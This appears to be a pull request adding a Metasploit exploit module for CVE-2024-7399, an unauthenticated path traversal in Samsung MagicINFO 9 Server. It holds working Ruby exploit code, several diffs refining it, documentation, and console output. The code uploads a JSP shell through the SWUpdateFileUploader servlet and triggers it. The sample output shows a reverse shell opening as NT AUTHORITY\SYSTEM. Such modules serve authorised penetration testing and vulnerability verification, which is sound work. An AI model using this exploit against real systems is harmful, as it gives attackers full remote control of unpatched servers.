### PR TITLE
Samsung MagicINFO 9 Server RCE (CVE-2024-7399) Module

### DIFF
--- a/documentation/modules/exploit/windows/http/magicinfo_traversal.md
+++ b/documentation/modules/exploit/windows/http/magicinfo_traversal.md
@@ -1,0 +1,67 @@
+## Vulnerable Application
+
+**Vulnerability Description**
+
+This module exploits a path traversal vulnerability in Samsung MagicINFO 9 <= 21.1050.0 (CVE-2024-7399).
+
+Remote code execution can be obtained by exploiting the path traversal vulnerability (CVE-2024-7399) in the SWUpdateFileUploader servlet,
+which can be queried by an unauthenticated user to upload a JSP shell.
+By default, the application listens on TCP ports 7001 (HTTP) and 7002 (HTTPS) on all network interfaces and runs in the context of NT
+AUTHORITY\SYSTEM.
+
+**Vulnerable Application Installation**
+
+A trial version of the software can be obtained from [the vendor]
+(https://www.samsung.com/us/business/solutions/digital-signage-solutions/magicinfo/).
+
+**Successfully tested on**
+
+- MagicINFO 9 21.1040.2 on Windows 10 (22H2)
+
+## Verification Steps
+
+1. Install Postgres or MySQL
+2. Install the application
+3. Activate the license
+4. Start `msfconsole` and run the following commands:
+
+```
+msf6 > use exploit/windows/http/magicinfo_traversal 
+msf6 exploit(windows/http/magicinfo_traversal) > set RHOSTS <IP>
+msf6 exploit(windows/http/magicinfo_traversal) > exploit 
+```
+
+You should get a shell in the context of `NY AUTHORITY\SYSTEM`.
+
+## Scenarios
+
+Running the exploit against MagicINFO 9 21.1040.2 on Windows 10 should result in an output similar to the
+following:
+
+```
+msf6 exploit(windows/http/magicinfo_traversal) > exploit 
+
+[*] Started reverse TCP handler on 192.168.137.204:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] MagicINFO version detected: MagicINFO 9 Server 21.1040.2
+[+] The target appears to be vulnerable.
+[*] Uploading payload...
+[*] Upload successful
+[*] Payload executed!
+[*] Command shell session 3 opened (192.168.137.204:4444 -> 192.168.137.230:50038) at 2025-05-14 17:36:47 -0400
+
+
+Shell Banner:
+Microsoft Windows [Version 10.0.19045.3208]
+(c) Microsoft Corporation. All rights reserved.
+
+C:\MagicInfo Premium\tomcat\bin>
+-----
+          
+
+C:\MagicInfo Premium\tomcat\bin>whoami
+whoami
+nt authority\system
+
+C:\MagicInfo Premium\tomcat\bin>
+```

--- a/documentation/modules/exploit/windows/http/magicinfo_traversal.md
+++ b/documentation/modules/exploit/windows/http/magicinfo_traversal.md
@@ -33,6 +33,11 @@ msf6 exploit(windows/http/magicinfo_traversal) > exploit
 
 You should get a shell in the context of `NY AUTHORITY\SYSTEM`.
 
+## Options
+
+### DEPTH
+The traversal depth. The FILE path will be prepended with ../ * DEPTH.
+
 ## Scenarios
 
 Running the exploit against MagicINFO 9 21.1040.2 on Windows 10 should result in an output similar to the

--- a/modules/exploits/windows/http/magicinfo_traversal.rb
+++ b/modules/exploits/windows/http/magicinfo_traversal.rb
@@ -52,8 +52,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
     register_options(
       [
-        OptString.new('TARGETURI', [ true, 'The URI for the MagicInfo web interface', '/MagicInfo']),
-        OptInt.new('DEPTH', [ true, 'The traversal depth. The FILE path will be prepended with ../ * DEPTH', 6 ])
+        OptString.new('TARGETURI', [true, 'The URI for the MagicInfo web interface', '/MagicInfo']),
+        OptInt.new('DEPTH', [true, 'The traversal depth. The FILE path will be prepended with ../ * DEPTH', 6])
       ]
     )
   end

--- a/modules/exploits/windows/http/magicinfo_traversal.rb
+++ b/modules/exploits/windows/http/magicinfo_traversal.rb
@@ -11,7 +11,8 @@ class MetasploitModule < Msf::Exploit::Remote
         'Name' => 'Samsung MagicINFO 9 Server Remote Code Execution (CVE-2024-7399)',
         'Description' => %q{
           Remote Code Execution in Samsung MagicINFO 9 Server <= 21.1050.0.
-          Remote code execution can be obtained by exploiting a path traversal vulnerability (CVE-2024-7399) in the SWUpdateFileUploader servlet, which can be queried by an unauthenticated user.
+          Remote code execution can be obtained by exploiting the path traversal vulnerability (CVE-2024-7399) in the SWUpdateFileUploader servlet,
+          which can be queried by an unauthenticated user to upload a JSP shell.
           By default, the application listens on TCP ports 7001 (HTTP) and 7002 (HTTPS) on all network interfaces and runs in the context of NT AUTHORITY\SYSTEM.
         },
         'License' => MSF_LICENSE,
@@ -21,7 +22,8 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
         'References' => [
           [ 'URL', 'https://ssd-disclosure.com/ssd-advisory-samsung-magicinfo-unauthenticated-rce/'],
-          [ 'CVE', '2024-7399']
+          [ 'URL', 'https://security.samsungtv.com/securityUpdates'],
+          [ 'CVE', '2024-7399'] # SVE-2024-50018
         ],
         'DisclosureDate' => '2025-04-30',
         'DefaultOptions' => {
@@ -61,17 +63,16 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri' => normalize_uri(target_uri.path, 'config.js')
     })
 
-    return CheckCode::Unknown unless res && res.code == 200
+    return CheckCode::Unknown unless res&.code == 200
 
-    js_object = res.body.to_s[/window\.globalConfig\s*=\s*(\{.*\})/m, 1]
+    js_object = res.body.to_s[/window\.globalConfig = (\{.+\})/m, 1]
 
     fail_with(Failure::UnexpectedReply, 'Could not extract globalConfig object from response.') unless js_object
 
-    json_safe = js_object.gsub(/'/, '"')
-    json_safe.gsub!(/,(\s*[}\]])/, '\1')
-    data = JSON.parse(json_safe)
+    json_b = js_object.gsub(/'/, '"') # replace ' with " so that we can use JSON.parse on the response body
+    data = JSON.parse(json_b)
 
-    full_version = data['magicInfoFrontEndVersion']
+    full_version = data.fetch('magicInfoFrontEndVersion', nil)
     version = full_version[/Server\s+([\d.]+)/, 1]
 
     return CheckCode::Unknown unless version
@@ -101,14 +102,14 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri' => normalize_uri(target_uri.path, 'servlet', "SWUpdateFileUploader?fileName=./#{traversal}server/#{shell}.jsp")
     })
 
-    if res && res.code == 200
+    if res&.code == 200
       print_good('Upload successful.')
       res1 = send_request_cgi({
         'uri' => normalize_uri(target_uri.path, "#{shell}.jsp"),
         'method' => 'GET'
       })
 
-      fail_with(Failure::PayloadFailed, 'Failed to execute the payload.') unless res1 && res1.code == 200
+      fail_with(Failure::PayloadFailed, 'Failed to execute the payload.') unless res1&.code == 200
       print_status('Payload executed!')
 
     else

--- a/modules/exploits/windows/http/magicinfo_traversal.rb
+++ b/modules/exploits/windows/http/magicinfo_traversal.rb
@@ -1,0 +1,116 @@
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Samsung MagicINFO 9 Server Remote Code Execution (CVE-2024-7399)',
+        'Description' => %q{
+          Remote Code Execution in Samsung MagicINFO 9 Server.
+          Remote code execution can be obtained by exploiting a path traversal vulnerability (CVE-2024-7399) in the SWUpdateFileUploader servlet, which can be queried by an unauthenticated user.
+          By default, the application listens on TCP ports 7001 (HTTP) and 7002 (HTTPS) on all network interfaces and runs in the context of NT AUTHORITY\SYSTEM.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Michael Heinzl', # MSF Module
+          'SSD Secure Disclosure' # Discovery and PoC
+        ],
+        'References' => [
+          [ 'URL', 'https://ssd-disclosure.com/ssd-advisory-samsung-magicinfo-unauthenticated-rce/'],
+          [ 'CVE', '2024-7399']
+        ],
+        'DisclosureDate' => '2025-04-30',
+        'Platform' => [ 'windows' ],
+        'Arch' => [ ARCH_CMD ],
+        'Targets' => [
+          [
+            'Java Server Page', {
+              'Platform' => %w[win linux unix],
+              'Arch' => ARCH_JAVA
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+
+    register_options(
+      [
+        Opt::RPORT(7002),
+        OptString.new('TARGETURI', [ true, 'The URI for the MagicInfo web interface', '/MagicInfo'])
+      ]
+    )
+  end
+
+  def check
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'config.js')
+    })
+
+    return CheckCode::Unknown unless res && res.code == 200
+
+    js_object = res.body.to_s[/window\.globalConfig\s*=\s*(\{.*\})/m, 1]
+
+    unless js_object
+      fail_with(Failure::UnexpectedReply, 'Could not extract globalConfig object from response')
+    end
+
+    json_safe = js_object.gsub(/'/, '"')
+    json_safe.gsub!(/,(\s*[}\]])/, '\1')
+    data = JSON.parse(json_safe)
+
+    full_version = data['magicInfoFrontEndVersion']
+    version = full_version[/Server\s+([\d.]+)/, 1]
+
+    if Rex::Version.new(version) <= Rex::Version.new('21.1050.0')
+      vprint_status("MagicINFO version detected: #{full_version}")
+      return CheckCode::Appears
+    else
+      return CheckCode::Safe
+    end
+  end
+
+  def exploit
+    execute_command(payload.encoded)
+  end
+
+  def execute_command(_cmd)
+    print_status('Uploading shell...')
+
+    post_data = _cmd
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'ctype' => 'text/plain',
+      'data' => post_data,
+      'uri' => normalize_uri(target_uri.path, 'servlet/SWUpdateFileUploader?fileName=./../../../../../../server/shell2.jsp&deviceType=abc&deviceModelName=test&swVer=123')
+
+    })
+
+    if res && res.code == 200
+      print_good('Upload successful.')
+      res1 = send_request_cgi({
+        'uri' => normalize_uri(target_uri.path, 'shell2.jsp'),
+        'method' => 'GET'
+      })
+      if res1 && res1.code == 200
+        print_status('Payload executed!')
+      else
+        fail_with(Failure::PayloadFailed, 'Failed to execute the payload.')
+      end
+    else
+      fail_with(Failure::UnexpectedReply, 'Failed to upload the payload.')
+    end
+  end
+
+end

--- a/modules/exploits/windows/http/magicinfo_traversal.rb
+++ b/modules/exploits/windows/http/magicinfo_traversal.rb
@@ -10,7 +10,7 @@ class MetasploitModule < Msf::Exploit::Remote
         info,
         'Name' => 'Samsung MagicINFO 9 Server Remote Code Execution (CVE-2024-7399)',
         'Description' => %q{
-          Remote Code Execution in Samsung MagicINFO 9 Server.
+          Remote Code Execution in Samsung MagicINFO 9 Server <= 21.1050.0.
           Remote code execution can be obtained by exploiting a path traversal vulnerability (CVE-2024-7399) in the SWUpdateFileUploader servlet, which can be queried by an unauthenticated user.
           By default, the application listens on TCP ports 7001 (HTTP) and 7002 (HTTPS) on all network interfaces and runs in the context of NT AUTHORITY\SYSTEM.
         },
@@ -24,12 +24,16 @@ class MetasploitModule < Msf::Exploit::Remote
           [ 'CVE', '2024-7399']
         ],
         'DisclosureDate' => '2025-04-30',
+        'DefaultOptions' => {
+          'RPORT' => 7002,
+          'SSL' => 'True'
+        },
         'Platform' => [ 'windows' ],
         'Arch' => [ ARCH_CMD ],
         'Targets' => [
           [
             'Java Server Page', {
-              'Platform' => %w[win linux unix],
+              'Platform' => %w[win],
               'Arch' => ARCH_JAVA
             }
           ]
@@ -45,8 +49,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
     register_options(
       [
-        Opt::RPORT(7002),
-        OptString.new('TARGETURI', [ true, 'The URI for the MagicInfo web interface', '/MagicInfo'])
+        OptString.new('TARGETURI', [ true, 'The URI for the MagicInfo web interface', '/MagicInfo']),
+        OptInt.new('DEPTH', [ true, 'The traversal depth. The FILE path will be prepended with ../ * DEPTH', 6 ])
       ]
     )
   end
@@ -61,9 +65,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     js_object = res.body.to_s[/window\.globalConfig\s*=\s*(\{.*\})/m, 1]
 
-    unless js_object
-      fail_with(Failure::UnexpectedReply, 'Could not extract globalConfig object from response')
-    end
+    fail_with(Failure::UnexpectedReply, 'Could not extract globalConfig object from response.') unless js_object
 
     json_safe = js_object.gsub(/'/, '"')
     json_safe.gsub!(/,(\s*[}\]])/, '\1')
@@ -72,45 +74,45 @@ class MetasploitModule < Msf::Exploit::Remote
     full_version = data['magicInfoFrontEndVersion']
     version = full_version[/Server\s+([\d.]+)/, 1]
 
-    if Rex::Version.new(version) <= Rex::Version.new('21.1050.0')
+    return CheckCode::Unknown unless version
+
+    unless Rex::Version.new(version) > Rex::Version.new('21.1050.0')
       vprint_status("MagicINFO version detected: #{full_version}")
       return CheckCode::Appears
-    else
-      return CheckCode::Safe
     end
+
+    return CheckCode::Safe
   end
 
   def exploit
     execute_command(payload.encoded)
   end
 
-  def execute_command(_cmd)
+  def execute_command(cmd)
     print_status('Uploading shell...')
 
-    post_data = _cmd
+    shell = Rex::Text.rand_text_alpha(8..12)
+    traversal = '../' * datastore['DEPTH']
 
     res = send_request_cgi({
       'method' => 'POST',
       'ctype' => 'text/plain',
-      'data' => post_data,
-      'uri' => normalize_uri(target_uri.path, 'servlet/SWUpdateFileUploader?fileName=./../../../../../../server/shell2.jsp&deviceType=abc&deviceModelName=test&swVer=123')
-
+      'data' => cmd,
+      'uri' => normalize_uri(target_uri.path, 'servlet', "SWUpdateFileUploader?fileName=./#{traversal}server/#{shell}.jsp")
     })
 
     if res && res.code == 200
       print_good('Upload successful.')
       res1 = send_request_cgi({
-        'uri' => normalize_uri(target_uri.path, 'shell2.jsp'),
+        'uri' => normalize_uri(target_uri.path, "#{shell}.jsp"),
         'method' => 'GET'
       })
-      if res1 && res1.code == 200
-        print_status('Payload executed!')
-      else
-        fail_with(Failure::PayloadFailed, 'Failed to execute the payload.')
-      end
+
+      fail_with(Failure::PayloadFailed, 'Failed to execute the payload.') unless res1 && res1.code == 200
+      print_status('Payload executed!')
+
     else
       fail_with(Failure::UnexpectedReply, 'Failed to upload the payload.')
     end
   end
-
 end

--- a/modules/exploits/windows/http/magicinfo_traversal.rb
+++ b/modules/exploits/windows/http/magicinfo_traversal.rb
@@ -21,9 +21,9 @@ class MetasploitModule < Msf::Exploit::Remote
           'SSD Secure Disclosure' # Discovery and PoC
         ],
         'References' => [
-          [ 'URL', 'https://ssd-disclosure.com/ssd-advisory-samsung-magicinfo-unauthenticated-rce/'],
-          [ 'URL', 'https://security.samsungtv.com/securityUpdates'],
-          [ 'CVE', '2024-7399'] # SVE-2024-50018
+          ['URL', 'https://ssd-disclosure.com/ssd-advisory-samsung-magicinfo-unauthenticated-rce/'],
+          ['URL', 'https://security.samsungtv.com/securityUpdates'],
+          ['CVE', '2024-7399'] # SVE-2024-50018
         ],
         'DisclosureDate' => '2025-04-30',
         'DefaultOptions' => {
@@ -41,6 +41,7 @@ class MetasploitModule < Msf::Exploit::Remote
           ]
         ],
         'DefaultTarget' => 0,
+        'Privileged' => true,
         'Notes' => {
           'Stability' => [CRASH_SAFE],
           'Reliability' => [REPEATABLE_SESSION],
@@ -67,7 +68,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     js_object = res.body.to_s[/window\.globalConfig = (\{.+\})/m, 1]
 
-    fail_with(Failure::UnexpectedReply, 'Could not extract globalConfig object from response.') unless js_object
+    return CheckCode::Safe('Could not extract globalConfig object from response.') unless js_object
 
     json_b = js_object.gsub(/'/, '"') # replace ' with " so that we can use JSON.parse on the response body
     data = JSON.parse(json_b)


### PR DESCRIPTION
This is a new module which exploits a path traversal vulnerability in Samsung MagicINFO 9 <= 21.1050.0 (CVE-2024-7399).

Remote code execution can be obtained by exploiting the path traversal vulnerability (CVE-2024-7399) in the `SWUpdateFileUploader` servlet, which can be queried by an unauthenticated user to upload a JSP shell.
By default, the application listens on TCP ports 7001 (HTTP) and 7002 (HTTPS) on all network interfaces and runs in the context of `NT AUTHORITY\SYSTEM`.

## Verification Steps

1. Install Postgres or MSSQL
2. Install the application from the [vendor](https://www.samsung.com/us/business/solutions/digital-signage-solutions/magicinfo/)
3. Activate the license (trial is sufficient)
4. Run Metasploit:
- [ ] Start `msfconsole` and enter the following commands
- [ ] `use exploit/windows/http/magicinfo_traversal`
- [ ] `set RHOSTS <IP>`
- [ ] `exploit`

This should result in a reverse shell:
```
msf6 exploit(windows/http/magicinfo_traversal) > exploit 

[*] Started reverse TCP handler on 192.168.137.204:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] MagicINFO version detected: MagicINFO 9 Server 21.1040.2
[+] The target appears to be vulnerable.
[*] Uploading payload...
[*] Upload successful
[*] Payload executed!
[*] Command shell session 3 opened (192.168.137.204:4444 -> 192.168.137.230:50038) at 2025-05-14 17:36:47 -0400


Shell Banner:
Microsoft Windows [Version 10.0.19045.3208]
(c) Microsoft Corporation. All rights reserved.

C:\MagicInfo Premium\tomcat\bin>
-----
          

C:\MagicInfo Premium\tomcat\bin>whoami
whoami
nt authority\system

C:\MagicInfo Premium\tomcat\bin>
```

**Successfully tested on**

Tested in the following deployment with a `java/jsp_shell_reverse_tcp` payload:
- MagicINFO 9 21.1040.2 on Windows 10 (22H2)

